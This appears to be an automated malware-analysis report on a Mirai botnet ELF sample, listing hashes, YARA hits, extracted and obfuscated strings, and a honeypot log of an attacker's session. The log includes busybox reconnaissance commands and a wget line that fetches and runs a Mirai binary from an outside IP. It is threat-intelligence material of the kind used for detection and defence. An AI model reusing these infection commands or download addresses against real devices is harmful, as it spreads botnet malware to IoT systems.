Sample details: 157679ac46d453489aba544e266ae5af

Hashes
MD5: 157679ac46d453489aba544e266ae5af
SHA1: 2d0b865ddcdd85ad0b4f032e2e900e811a38cbba
SHA256: 382349e6b3bcd8b1b299d94b7b216078617ce4b1653d9a4aff453439f8c6f909
SSDEEP: 1536:WusXlwjmqU6gRh2LnvyFpmWeUESckP98Q:WuilwCqU6gCTvyFpmWetScEeQ
Details
File Type: ELF
Yara Hits
YRP/maldoc_getEIP_method_1 | YRP/contentis_base64 | YRP/url | YRP/domain | YRP/IP | YRP/Big_Numbers1 | FlorianRoth/Mirai_Botnet_Malware
Strings
		PTRh6K
D$LhmK
L$d9L$p
D$p9D$,
D$(j@j
D$$j@j
D$(_]j
;|$(t:WWj
D$ j@j
\$H9\$
D$ j@j
< t <	t
C)QQWP
D$ JR**
f;D$Pu
;T$(}Q
D$$PSV
xAPPSh`c
\$Th<`
\$0PPj
}/C;T$
t$$hl`
u%WWSS
[2016-12-11 03:47:56 UTC] [163.172.121.4:37345] CMD: sh
[2016-12-11 03:47:57 UTC] [163.172.121.4:37345] CMD: /bin/busybox ECCHI
[2016-12-11 03:48:04 UTC] [163.172.121.4:37345] CMD: /bin/busybox ps; /bin/busybox ECCHI
[2016-12-11 03:48:05 UTC] [163.172.121.4:37345] CMD: /bin/busybox cat /proc/mounts; /bin/busybox ECCHI
[2016-12-11 03:48:08 UTC] [163.172.121.4:37345] CMD: /bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
[2016-12-11 03:48:12 UTC] [163.172.121.4:37345] CMD: /bin/busybox echo -e '\x6b\x61\x6d\x69/home/admin' > /home/admin/.nippon; /bin/busybox cat /home/admin/.nippon; /bin/busybox rm /home/admin/.nippon
[2016-12-11 03:48:13 UTC] [163.172.121.4:37345] CMD: /bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
[2016-12-11 03:48:14 UTC] [163.172.121.4:37345] CMD: /bin/busybox ECCHI
[2016-12-11 03:48:15 UTC] [163.172.121.4:37345] CMD: rm /home/admin/.t; rm /home/admin/.sh; rm /home/admin/.human
[2016-12-11 03:48:15 UTC] [163.172.121.4:37345] CMD: cd /home/admin/
[2016-12-11 03:48:17 UTC] [163.172.121.4:37345] CMD: /bin/busybox cp /bin/echo dvrHelper; >dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI
[2016-12-11 03:48:19 UTC] [163.172.121.4:37345] CMD: /bin/busybox cat /bin/echo
[2016-12-11 03:48:20 UTC] [163.172.121.4:37345] CMD: /bin/busybox ECCHI
[2016-12-11 03:48:21 UTC] [163.172.121.4:37345] CMD: /bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI
[2016-12-11 03:48:22 UTC] [163.172.121.4:37345] CMD: /bin/busybox wget http://80.82.64.2:80/bins/mirai.x86 -O - > dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI
t@;D$xu
POST /cdn-cgi/
 HTTP/1.1
User-Agent: 
Host: 
Cookie: 
/proc/net/tcp
/dev/watchdog
/dev/misc/watchdog
abcdefghijklmnopqrstuvw012345678
ZOJFKRA
FGDCWNV
HWCLVGAJ
QWRRMPV
RCQQUMPF
QOACFOKL
OGKLQO
cFOKLKQVPCVMP
QGPTKAG
QWRGPTKQMP
CFOKLKQVPCVMP
Q[QVGO
FPGCO@MZ
PGCNVGI
CFOKL"
CFOKLbO[OKDK"
xOStDMqkr"
CLVQNS"
FGDCWNV"
CFOKLNTHJ"
CFOKLNTHJCFOKLNTHJ
assword
NKQVGLKLE
uEzAs"
FGNGVGF
CLKOG"
QVCVWQ"
pgrmpv
jvvrdnmmf"
nmnlmevdm"
XMNNCPF"
egvnmacnkr"
QJGNN"
GLC@NG"
Q[QVGO"
@WQ[@MZ
okpck"
CRRNGV
DMWLF"
LAMPPGAV"
@WQ[@MZ
@WQ[@MZ
vqMWPAG
gLEKLG
sWGP["
PGQMNT
LCOGQGPTGP
aMLLGAVKML
CNKTG"
QGVaMMIKG
PGDPGQJ
NMACVKML
AMMIKG
AMLVGLV
NGLEVJ
VPCLQDGP
GLAMFKLE
AJWLIGF"
AMLLGAVKML
QGPTGP
FMQCPPGQV"
QGPTGP
ANMWFDNCPG
LEKLZ"
cAAGRV
CRRNKACVKML
ZJVON	ZON
CRRNKACVKML
cAAGRV
nCLEWCEG
aMLVGLV
CRRNKACVKML
WPNGLAMFGF"
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
aJPMOG
qCDCPK
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
aJPMOG
qCDCPK
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
aJPMOG
qCDCPK
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
aJPMOG
qCDCPK
oMXKNNC
oCAKLVMQJ
cRRNGuG@iKV
tGPQKML
qCDCPK
/dev/null
[2016-12-11 03:49:45 UTC] [163.172.121.4:37345] SAMPLE: /etc/blue/039d3e6ea326a3a3b9b454d67107a00b